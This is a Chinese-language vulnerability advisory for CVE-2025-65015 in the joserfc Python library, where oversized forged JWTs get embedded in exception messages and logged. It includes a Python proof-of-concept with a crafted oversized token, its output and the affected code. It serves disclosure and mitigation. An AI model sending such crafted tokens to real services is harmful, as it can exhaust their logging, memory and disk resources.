CVE-2025-65015:joserfc库可能的不可控资源消耗漏洞
漏洞详情
摘要
ExceededSizeError 异常消息嵌入了未解码的JWT令牌部分,可能导致Python日志记录工具记录任意大的、被伪造的JWT有效载荷。
详情
在一种情况下,如果一个配置错误(或完全缺失)的生产级Web服务器位于Python Web应用之前,攻击者可能能够在HTTP请求头中发送任意大的承载令牌(bearer tokens)。当这种情况发生时,在 joserfc.jwt.decode() 操作期间,Python日志记录或诊断工具(例如Sentry)可能最终处理包含完整JWT头部的极大日志消息。在验证声明和签名有效载荷大小时也会出现相同行为,因为该库会抛出嵌入了完整有效载荷的 joserfc.errors.ExceededSizeError() 异常消息。由于有效载荷在此阶段已完全加载到内存中,库本身无法阻止或拒绝它。
因此,强制实施请求头大小限制的责任在于底层的Web服务器(uvicorn/h11, gunicorn, Starlette, Werkzeug, nginx…等)。例如,一个没有运行在uvicorn和/或gunicorn之后的FastAPI/Starlette应用程序无法自行强制执行请求头大小限制。使用uvicorn/h11时,--h11-max-incomplete-event-size 选项可以限制头部加正文的总大小,但不能单独限制头部大小。类似地,vLLM serve由于其依赖uvicorn/h11以及机器学习推理工作负载中需要大量数据传输,默认将头部加正文的限制设置为4 MB,并且经常被提高。在实践中,通常需要一个健壮的反向代理(如nginx),因为它可以明确限制最大请求头大小。不幸的是,许多Web应用程序并没有运行在合适的反向代理之后。
考虑到这些限制,joserfc库无法安全地记录或嵌入任意大小的有效载荷。这个问题尤其微妙,因为它只发生在恶意构造的JWT最终到达Python应用程序时,这种情况大多数开发者在常规开发和测试中永远不会遇到。
漏洞复现(PoC)
环境
- Ubuntu 24.04 LTS
- Python 3.12
- 在 joserfc 版本 1.4.1 上测试
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
|
import logging
from datetime import UTC, datetime, timedelta
from joserfc import jwt
from joserfc.errors import ExceededSizeError, UnsupportedAlgorithmError
from joserfc.jwk import OctKey
logger = logging.getLogger(__name__)
SECRET_KEY = "8c13bd66babc241b29f8553429bdab7deb6f5b74ddfda7765471e57ecd55641e"
LONG_JWT_TOKEN = (
"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGQifQ"
"."
"eyJpc3MiOiJhdXRoX3NlcnZlciIsImlhdCI6MTc2MzI0OTEwMSwiZXhwIjoxNzY5MjQ5MTAxfQ"
"."
"6-k2jmkGXD6wXOgYgjPS8E5lS_GjWpgIuY54gokjAn8"
)
HEADER = {
"alg": (
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
"RS256dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
),
}
CLAIMS = {
"iss": "auth_server",
"iat": datetime.now(UTC),
"exp": datetime.now(UTC) + timedelta(minutes=15),
}
def main():
# 从 SECRET_KEY 创建 OctKey
key = OctKey.import_key(SECRET_KEY)
# 模拟创建一个非常大的JWT
# (这将因为无效的'alg'头部内容而失败,并抛出 joserfc.errors.UnsupportedAlgorithmError)
try:
token = jwt.encode(HEADER, CLAIMS, key)
except UnsupportedAlgorithmError:
# 使用一个具有相同头部和声明但签名无效的伪造令牌
token = LONG_JWT_TOKEN
logger.warning(f"Created JWT: {token}")
# 现在尝试解码大型JWT
try:
decoded_token = jwt.decode(token, key)
logger.warning("This line will never be reached.")
logger.warning(decoded_token.claims)
except ExceededSizeError:
logger.exception(
"The JWT size is too large and may be a security attack attempt."
)
# 这会在异常消息中记录整个头部内容!
|
输出示例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
Created JWT: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGQifQ.eyJpc3MiOiJhdXRoX3NlcnZlciIsImlhdCI6MTc2MzI0OTEwMSwiZXhwIjoxNzY5MjQ5MTAxfQ.6-k2jmkGXD6wXOgYgjPS8E5lS_GjWpgIuY54gokjAn8
The JWT size is too large and may be a security attack attempt.
Traceback (most recent call last):
claims = jwt.decode(token, key)
^^^^^^^^^^^^^^^^^^^^^^
File ".venv/lib/python3.12/site-packages/joserfc/jwt.py", line 106, in decode
header, payload = _decode_jws(_value, key, algorithms, registry)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File ".venv/lib/python3.12/site-packages/joserfc/jwt.py", line 127, in _decode_jws
jws_obj = deserialize_compact(value, key, algorithms, registry)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File ".venv/lib/python3.12/site-packages/joserfc/jws.py", line 183, in deserialize_compact
obj = extract_compact(to_bytes(value), payload, registry)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File ".venv/lib/python3.12/site-packages/joserfc/_rfc7797/compact.py", line 50, in extract_rfc7515_compact
registry.validate_header_size(header_segment)
File ".venv/lib/python3.12/site-packages/joserfc/_rfc7515/registry.py", line 104, in validate_header_size
raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max_header_length} bytes.")
joserfc.errors.ExceededSizeError: exceeded_size: Header size of 'b'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRSUzI1NmRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGQifQ'' exceeds 512 bytes.
|
代码位置
此行为出现在以下位置:
joserfc/_rfc7515/registry.py
L102-112
1
2
3
4
5
6
7
8
9
10
11
|
def validate_header_size(self, header: bytes) -> None:
if header and len(header) > self.max_header_length:
raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max_header_length} bytes.")
def validate_payload_size(self, payload: bytes) -> None:
if payload and len(payload) > self.max_payload_length:
raise ExceededSizeError(f"Payload size of '{payload!r}' exceeds {self.max_payload_length} bytes.")
def validate_signature_size(self, signature: bytes) -> None:
if len(signature) > self.max_signature_length:
raise ExceededSizeError(f"Signature of '{signature!r}' exceeds {self.max_signature_length} bytes.")
|
joserfc/_rfc7516/registry.py
L103-123
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
def validate_protected_header_size(self, header: bytes) -> None:
if header and len(header) > self.max_protected_header_length:
raise ExceededSizeError(f"Header size of '{header!r}' exceeds {self.max_protected_header_length} bytes.")
def validate_encrypted_key_size(self, ek: bytes) -> None:
if ek and len(ek) > self.max_encrypted_key_length:
raise ExceededSizeError(f"Encrypted key size of '{ek!r}' exceeds {self.max_encrypted_key_length} bytes.")
def validate_initialization_vector_size(self, iv: bytes) -> None:
if iv and len(iv) > self.max_initialization_vector_length:
raise ExceededSizeError(
f"Initialization vector size of '{iv!r}' exceeds {self.max_initialization_vector_length} bytes."
)
def validate_ciphertext_size(self, ciphertext: bytes) -> None:
if ciphertext and len(ciphertext) > self.max_ciphertext_length:
raise ExceededSizeError(f"Ciphertext size of '{ciphertext!r}' exceeds {self.max_ciphertext_length} bytes.")
def validate_auth_tag_size(self, tag: bytes) -> None:
if tag and len(tag) > self.max_auth_tag_length:
raise ExceededSizeError(f"Auth tag size of '{tag!r}' exceeds {self.max_auth_tag_length} bytes.")
|
joserfc/_rfc7518/jwe_zips.py 中出现的另一个 ExceededSizeError 不受此问题影响,因为它没有在异常消息中包含有效载荷内容。
影响
在Web应用程序不拒绝过大的HTTP请求头有效载荷的场景下,使用joserfc可能会使系统面临“无限制或节流的资源分配”(CWE-770)的风险,可能影响应用主机以及任何外部日志存储、数据摄取管道或告警服务的磁盘、内存和CPU。通过从某些 joserfc.errors.ExceededSizeError() 异常消息的日志内容中移除JWT有效载荷,可以缓解此风险。文档也应建议将该库部署在能够正确强制执行最大请求头大小的健壮Web服务器或反向代理之后。
参考